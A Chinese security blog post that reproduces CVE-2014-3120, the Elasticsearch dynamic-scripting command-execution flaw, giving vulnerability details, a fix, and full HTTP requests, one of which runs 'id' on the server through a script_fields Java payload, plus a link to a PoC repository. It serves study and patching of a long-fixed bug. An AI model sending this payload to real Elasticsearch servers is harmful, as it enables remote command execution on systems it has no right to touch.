美文网首页MYD网络安全实验室
ElasticSearch 命令执行漏洞

ElasticSearch 命令执行漏洞

作者: 有一个男孩叫阿威 | 来源:发表于2023-12-20 17:26 被阅读0次

漏洞编号:CVE-2014-3120

漏洞详情

CVE编号 CVE-2014-3120 漏洞级别 中危6.8
标题 Elasticsearch默认配置允许动态脚本执行漏洞 披露时间 2014/07/29
漏洞总结 Elasticsearch 1.2版本及之前的默认配置启用了动态脚本,攻击者可以通过_search的source参数执行任意MVEL表达式和Java代码。需要注意的是,只有在用户没有在独立的虚拟机中运行Elasticsearch时,这才违反了供应商的安全策略。
利用路径 NETWORK 利用难度 一般8.6
影响产品 elasticsearch
解决方案 升级Elasticsearch到1.2.1以上版本,或禁用动态脚本功能。建议将Elasticsearch运行在一个独立的虚拟机中,以增强安全性。

漏洞复现

添加一条数据

POST /website/blog/ HTTP/1.1
Host: 0.0.0.0:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "phithon"
}

执行命令

POST /_search?pretty HTTP/1.1
Host: 0.0.0.0:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\"id\\").getInputStream()).useDelimiter(\\"\\\\\\\\A\\").next();"
        }
    }
}

POC&EXP

github:POC-EXP/ElasticSearch 命令执行漏洞 at main · twsec-pro/POC-EXP (github.com)

yakit:cc5908ae-5ea5-4060-8f15-1da729b3fb8c

2.gif

相关文章

  • CVE-2014-3120

    ElasticSearch 命令执行漏洞(CVE-2014-3120) 1.漏洞影响版本 Elasticsearc...

  • 从0到1学习网络安全 【实战篇 - ElasticSearch命

    ElasticSearch命令执行漏洞(CVE-2014-3120) 注:今后继续定期更新---“实战”! Ste...

  • 2.命令执行漏洞

    定义:攻击者可以随意执行系统命令,命令可以连接执行:&,||,| 命令执行漏洞:直接调用操作系统命令 代码执行漏洞...

  • CVE-2015-1427

    ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427) 1.漏洞影响...

  • Samba远程命令执行漏洞(CVE-2017-7494)

    一、 实验目标 理解Samba远程命令执行漏洞的原理 掌握怎么利用Samba远程命令执行漏洞 链接:https:/...

  • elasticsearch 后台启动

    执行命令: /usr/local/elasticsearch/elasticsearch-7.8.0/bin/el...

  • 干货 | 命令执行漏洞和代码执行漏洞详解

    命令执行(RCE)漏洞和代码执行漏洞区别如下: 代码执行实际上是调用服务器网站代码进行执行 命令执行则是调用操作系...

  • 命令执行漏洞

    一、命令执行漏洞基本定义 命令执行漏洞是指攻击者可以随意执行系统命令,其B/S架构和C/S架构都是存在的,是高危漏...

  • 命令执行漏洞

    命令执行 利用条件 应用调用执行系统命令的函数 将用户输入作为系统命令的参数拼接到了命令行中 没有对用户输入进行过...

  • 命令执行漏洞

    1脚本语言(如PHP)优点是简洁、方便,但也伴随着一些问题,如速度慢、无法接触系统底层,如果我们开发的应用(特别是...

网友评论

    本文标题:ElasticSearch 命令执行漏洞

    本文链接:https://www.haomeiwen.com/subject/mmtxndtx.html